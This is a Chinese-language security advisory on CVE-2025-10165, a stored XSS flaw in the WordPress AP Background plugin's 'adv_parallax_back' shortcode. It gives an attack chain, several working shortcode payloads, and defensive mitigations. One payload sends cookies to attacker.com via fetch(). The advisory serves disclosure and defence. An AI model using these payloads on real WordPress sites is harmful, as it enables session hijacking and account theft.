CVE-2025-10165：WordPress AP Background插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-10165

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress AP Background 插件

漏洞概述

CVE-2025-10165是WordPress AP Background插件中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞由Wordfence安全团队的安全研究员发现，于2025年10月3日公开披露。AP Background是一款用于在WordPress网站中添加视差滚动背景效果的插件，通过短代码（shortcode）方式实现页面装饰功能。

该漏洞存在于插件的 'adv_parallax_back' 短代码处理逻辑中，CVSS评分为6.4分，属于中危级别。其根本原因在于插件对用户输入的属性参数（attributes）缺乏充分的输入净化（input sanitization）和输出转义（output escaping）处理。攻击者可以通过精心构造的短代码属性，将恶意的JavaScript脚本注入到WordPress页面或文章内容中。由于这些恶意脚本被持久化存储在服务器端，每当普通用户访问包含该注入内容的页面时，恶意脚本就会自动执行，从而实现会话劫持、cookie窃取、钓鱼攻击或权限提升等危害。

该漏洞的攻击前提是攻击者需要拥有WordPress的贡献者（Contributor）级别或更高权限的账户，这意味着该漏洞通常被利用于多用户WordPress站点的内部攻击、权限提升链中的中间环节，或结合社会工程学手段获取低权限账户后的进一步攻击。

技术细节

从技术层面分析，CVE-2025-10165漏洞的核心问题出在AP Background插件的短代码处理类（shortCodeClass.php，第44行附近）。在WordPress中，短代码是一种允许开发者通过简单的方括号语法（如 [shortcode attr="value"]）在文章或页面中插入动态内容的机制。

该插件注册了名为 'adv_parallax_back' 的短代码，用于在页面中渲染视差背景效果。当用户在文章编辑器中插入类似 [adv_parallax_back image="url" title="text"] 的短代码时，插件会解析这些属性值并将其嵌入到HTML输出中。然而，插件开发者未对用户提供的属性值进行适当的转义处理（如未调用 esc_attr()、esc_html() 或 wp_kses_post() 等WordPress安全函数），导致攻击者可以传入包含HTML和JavaScript代码的恶意字符串。

具体利用方式如下：拥有Contributor级别权限的攻击者创建或编辑一篇文章，在文章正文中插入包含恶意脚本的短代码，例如：[adv_parallax_back title='"><script>alert(document.cookie)</script>']。当文章发布后，恶意脚本被存储到数据库中。每当任何用户（包括管理员）访问该页面时，浏览器会解析并执行注入的JavaScript代码。攻击者可以利用此漏洞窃取用户会话cookie、进行钓鱼攻击、修改页面内容（如植入恶意链接）、或利用管理员权限创建新的管理员账户。由于WordPress的短代码机制在内容渲染时会执行，传统的XSS过滤可能无法完全拦截此类攻击。

攻击链分析

STEP 1

步骤1：获取低权限账户

攻击者通过社会工程学、凭证填充攻击或购买等方式获取目标WordPress站点的Contributor（贡献者）级别或更高权限的账户。

STEP 2

步骤2：登录WordPress后台

攻击者使用获取的凭证登录WordPress管理后台，确认账户具有创建或编辑文章的权限。

STEP 3

步骤3：构造恶意短代码

攻击者创建新文章或编辑现有文章，在内容中插入包含恶意JavaScript代码的 'adv_parallax_back' 短代码，利用未转义的属性参数注入XSS载荷。

STEP 4

步骤4：发布包含恶意内容的文章

攻击者将包含恶意短代码的文章发布，恶意脚本被持久化存储到WordPress数据库中。

STEP 5

步骤5：等待受害者访问

当任意用户（包括管理员、编辑或其他访问者）浏览包含恶意短代码的文章页面时，注入的JavaScript代码将在受害者浏览器中自动执行。

STEP 6

步骤6：执行恶意操作

恶意脚本在受害者上下文中执行，可窃取会话cookie、进行钓鱼、劫持账户、植入后门或利用管理员权限进行进一步的攻击活动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Stored XSS PoC for CVE-2025-10165 -->
<!-- Attack Scenario: Authenticated Contributor-level attacker injects malicious payload via shortcode attribute -->

<!-- Step 1: Attacker logs into WordPress with Contributor or higher privileges -->
<!-- Step 2: Attacker creates a new post or edits an existing one -->
<!-- Step 3: Attacker inserts the following malicious shortcode in the post content -->

[adv_parallax_back title='"><script>alert("XSS-Vulnerability-CVE-2025-10165")</script>']

<!-- Alternative payloads for cookie stealing / session hijacking -->

<!-- Payload 1: Simple alert-based proof of concept -->
[adv_parallax_back title='"><script>alert(document.domain)</script>']

<!-- Payload 2: Cookie exfiltration (requires attacker-controlled server) -->
[adv_parallax_back title='"><script>fetch("https://attacker.com/steal?c="+document.cookie)</script>']

<!-- Payload 3: Event handler injection -->
[adv_parallax_back title='" onmouseover="alert(1)"']

<!-- Payload 4: Image tag with onerror handler -->
[adv_parallax_back image='" onerror="alert(document.cookie)"']

<!-- Step 4: Attacker publishes the post -->
<!-- Step 5: Any user visiting the post page will trigger the injected JavaScript -->
<!-- Step 6: Malicious code executes in victim's browser context -->

<!-- Impact: Session hijacking, credential theft, privilege escalation, defacement -->

影响范围

WordPress AP Background 插件 <= 3.8.2

防御指南

临时缓解措施

在无法立即升级插件的情况下，建议采取以下临时缓解措施：首先，临时禁用AP Background插件以阻止漏洞被利用；其次，严格审查所有Contributor及以上权限的用户账户，暂停可疑账户的访问权限；此外，使用Wordfence等安全插件配置XSS防护规则，对包含可疑短代码属性的内容进行拦截；最后，部署内容安全策略（CSP）HTTP响应头，限制页面中内联脚本的执行，降低XSS攻击的危害程度。同时应尽快联系插件开发者确认修复版本的发布，并安排升级计划。